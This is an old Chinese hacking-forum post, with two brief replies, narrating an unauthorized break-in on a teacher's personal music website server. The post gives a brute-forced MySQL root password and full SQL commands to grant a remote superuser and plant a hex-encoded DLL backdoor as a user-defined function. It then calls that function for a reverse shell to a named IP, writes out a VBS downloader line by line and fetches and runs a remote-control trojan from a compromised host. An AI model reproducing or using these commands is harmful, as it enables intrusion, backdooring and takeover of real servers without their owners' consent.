AbyssalSwamp  ActivaUser
» Guest:  Register | Login | 会员列表

RSS subscription to this AbyssalSwamp  

Previous thread Next thread
     
Title: 黑客任务菜鸟之入侵实战  
 
Guest 58.209.199.x
Unregistered









黑客任务菜鸟之入侵实战

又是一个阳光灿烂的日子,复习了一天的编译原理,头都大了一倍。。(老师:谁TMD叫你不去上课!~)寒~~~ 回到寝室还是第一时间打开偶的宝贝电脑,随手点进几个黑客站点逛逛,发现都还是前几天的文章。 闲着无聊的时候,忽然想起偶的软件工程老师在开学的第一节课说的,他有个人网站,叫偶们有时间去看看 。呵呵,那就去看看吧。进来了,是一个音乐站,第一感觉是站的美工还错的不错, 如图1 嘿嘿,偶不说大家都应该知道偶下一步要做什么了!^_^~ 随便点一个连接,发现在状态拦里显示的是一个JAVASCRIPT脚本连接: javascript[s:60]pen_window(\'ShowMusic.asp?id=3270\',\'ShowMusic\',\'width=366,heigut=80\');于是就把把段地址凑成一个完整的 路径,http://cidea.cn/WToponline/djweb/ShowMusic.asp?id=3270.加’点先,我昏,回车后弹出一对话框 \"你试图SQL注入本站,不过没那么容易!\", 如图2 安全做的还不错哈!~,不过这也 钩起了偶的挑战欲望了哈! 那么这个站从SQL注入来说就基本每戏了,先拿出DOMAIN3.5去跑跑域名吧 ,一共有10来个站,看了下基本上 没什么大的漏洞,其中有俩个纯在SQL注入都是ACCESS数据库,而且暴出来的权限都是前台文章管理员,基本上是没什么用!~ 那不就是说常规的入侵手法是行不通了,那先看看服务器主机的情况吧!~ 先PING一下,返回IP为:61.129.35.*,直接telnet IP 80 然后get返回 HTTP/1.1 200 OK Date: Sun, 18 Dec 2005 05:35:48 GMT Server: Microsoft-IIS/5.0 服务器应该是2000的吧,后来登陆3389也证实了这一点, 既然是从主机入手,还是先扫描一下,拿出superscan3.0扫了一下。发现开了80.21.3306,也就是说服务器用的是MYSQL数据库 现在的mysql若口令还是一抓一大把的,偶就搞了几个极品的MYSQL服务器哈!~那就用HScan,挂上偶制作的超级字典带着 30%去跑一下吧,毕竟偶还是很相信偶的字典的威力的,^_^ 好了,一杯茶的功夫,到偶的肉鸡上一看,还真的有收获哈!~帐号:root密码:654321 哈哈,这下看你还不死,马上mysql -h61.129.35.* -p 输入654321回车,连上了, 如图3 mysql〉 use test;create table tmp(str TEXT); 然后凭着自己入侵的一点经验,开始猜测IIS主目录的物理路径, c:inetpubwwwroot,c:www,c:wwwroot,c:inetpubweb,d:web, d:wwwroot。。 越猜越郁闷啊,算了,不猜了从MYSQL写马的这条路就先放一放吧, (ps:方法就是找到物理路径后 insert into cmd values(\"一行一行的asp代码,呵呵\"); 然后 select * from cmd into outfile \"路径cmd.asp\"; 然后把我们刚才建的表都删除掉: mysql〉 use test; drop table tmp; drop table cmd;) 下面我们看看能不能上传我们的后们DLL,现在目前来说用的比较多的就是MIX的两个dll可以支持正象 和反向连接,偶一般用反向连接功能可以突破防火墙,怎么把他通过mysql传过去呢?其实方法很早就公布了 只不过没有象MSSQL那样的普及,呵呵,简单的原理偶还是说一下吧,老鸟跳过 ============================================================================================ set @a = concat(\'\'.....); GRANT ALL PRIVILEGES ON *.* TO awhy@\'%\'IDENTIFIED BY \'tamade\' WITH GRANT OPTION ;(授权) use mysql; FLUSH PRIVILEGES; create table HCKE(data LONGBLOB);(创建表) insert into HACK values(\"\"); update HACK set data = @a;(修改插入数据。这个@a我们DLL文件的16进制的代码) select data from HACK into DUMPFILE \'c rogram FilesHACK.dll\';(16进制还原成dll二进制文本) drop table HACK; CREATE FUNCTION backdoor RETURNS STRING SONAME \'c rogram FilesHACK.DLL\';(创建函数backdoor) 如何得到DLL文件的16进制代码呢?可以直接在UE里打开DLL文件,转换成16进制后复制出来就可以了 如图5 把你复制的代码加在 set @a = concat(\'\'代码); 里的代码里,就可以了 把上面的保存在一个TEXT里接着就可以传了 ============================================================================================ mysql>. c:mix.txt,呵呵没有出错,看来成功把偶的后门传上去了哈!~胜利在望了。。 如图6 接着来反弹SHELL吧 先监听端口,我用的是16398 mysql>select mix(\'58.49.199.99\',\'16398\');如图6,7 58.49.199.99 是你要返回shell的ip,。 我们这里用的是肉鸡的ip,^_^ 好了,得到了shell, 写一个脚本来下载木马先 echo iRemote = LCase(WScript.Arguments(0)) >>c:down.vbs Set xPost = CreateObject(\"Microsoft.XMLHTTP\") >>c:down.vbs xPost.Open \"GET\",iRemote,0 >>c:down.vbs xPost.Send() >>c:down.vbs Set sGet = CreateObject(\"ADODB.Stream\") >>c:down.vbs sGet.Mode = 3 >>c:down.vbs sGet.Type = 1 >>c:down.vbs sGet.Open() >>c:down.vbs sGet.Write(xPost.responseBody) >>c:down.vbs sGet.SaveToFile iLocal,2 >>c:down.vbs 用TYPE先看一下是不是有错误,确认没问题了,来 c:down.vbs http://偶的web肉鸡/CFFW/xpsp2.exe updata.exe 很快就下好了(感谢Matin提供PCshare),运行。。。 OK,上线了。如图8 呵呵,剩下的事就是清理战场了!~删了c:down.vbs还有那个dll 最后然后帮他把漏洞堵上吧, 入侵到次就算搞一段落了,用angle的那句话:工具只是武器,技术才是灵魂。自己动手,丰衣足事。 偶的原来的QQ不用,换了一个qq:422165416希望高手加偶一起讨论
欢迎光临 www.tenyqq.cn

[此贴子已经被作者于2006-12-28 20:35:35编辑过]

2006-12-29 04:32#1
 Edit post Top
 
tim11tang





UID 146845
Digest 0
Points 0
Posts 0
码币MB 0 Code
黄金 0 Catty
钻石 0 Pellet
Permissions 10
Register 2007-10-26
Status offline
好帖子顶!!!
2007-3-26 04:42#2
View profile  Blog  Send a short message  Top
 
不爱你好吗





UID 154416
Digest 0
Points 0
Posts 0
码币MB 0 Code
黄金 0 Catty
钻石 0 Pellet
Permissions 10
Register 2007-3-18
Status offline
2007-5-27 16:54#3
View profile  Blog  Send a short message  Top
     


  Printable version | Recommend to a friend | Subscribe to topic | Favorite topic  


 


All times are GMT+8, and the current time is 2026-1-16 04:43 Clear informations ->sessions/cookies - Contact Us - CAFFZ - ZAKE